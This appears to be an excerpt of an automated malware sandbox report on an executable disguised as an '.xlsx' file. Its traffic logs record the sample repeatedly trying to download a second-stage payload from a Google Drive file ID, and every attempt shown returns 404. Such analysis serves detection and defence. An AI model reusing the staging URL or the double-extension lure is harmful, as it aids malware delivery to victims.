      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7otclPp6kUkj9Txte22X9qcUBAFq6kX4UIMZ89XpCixvR11jxcht3Cm_q4Y8I59C_zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QAxJTfIpNBUuOSTsK97zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU; expires=Tue, 17-Jun-2025 17:05:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65-DEoJXWYw4Izsi7h2NiMRHNiFvluyONc8W2NVZI2wKz7M8kG3U6XTPZ4NWYWCzOjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:37 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-MxBkN0_e0DXXEWZnj9Toqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Cg-gtBAGLfPXSXvdGgeRxlrSs786ui4JbkTpH2jwIBoqnyKIokNII-bibXZaZeYjkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-sIQsjuBS7kXdZycCF__4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78hZ8vB7uaRS0PlP3iyi3CD-5-RkxIfCt2uvNptsoSiYbQG7QrUNUu0GsYovkTm2wCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:08 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7amad5-KjK-4UpjSGr5GEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6RcJKxOcZ8kVuxTP6nHEOVSCpVeF7qhjsc4seXpcbgwBUOQR6fY5oUDMEKR-h0w8_JContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:24 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-2Jas3iTkHt7nF5dB3sLULA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rPh166RMBB6xpz6w9niqgzREj2_SB50KwPB0eZ8B9vUd3N2DS24KTG5jiHA6MVSxaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-Ef0-Lv55KyzmQgf7KTlyBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wDUyyhJyymcLpAnb-Y-MR213vNES_SiwhEusWybTLMaMid1-ffFKZRjKiB9ZguzqGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:55 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7LMe386rfH91p3LmUy6pBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7aweZMacvmUf5gu6P_92Y143zJ-IcQZHTqpX_CLjH8f2Fe9dwf2xiPzQXE8Z902rRRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-aq1AFrrxZ3LER01lHV6nWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7UPMuB80rDbALWgk-Q7HuTIc42Nb5-mH2sXTEMr0Li_jKeAWNBWVH4BMkUbzxkHQROContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PMfDxcEX284aRXl0mEZaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7lhzDMhaIkxEICzsWwrnilFgThikntNQtqZZmlRb6jEUxRL1uwozKZj3VYDFEEAJuPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-IXILVF3bU-z09tFmVcjZ_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7vwFbp_BZu8CrE68JE2Hu6OguQprRj7PgtTdeP7oIriTuX45D6dTJVK-ex2g9L8-GGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:59 GMTContent-Security-Policy: script-src 'nonce-OmsC__QuN2BMpl_AVgvkQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: 09-FD-94.03.60.175.07.xlsx.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.goF
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
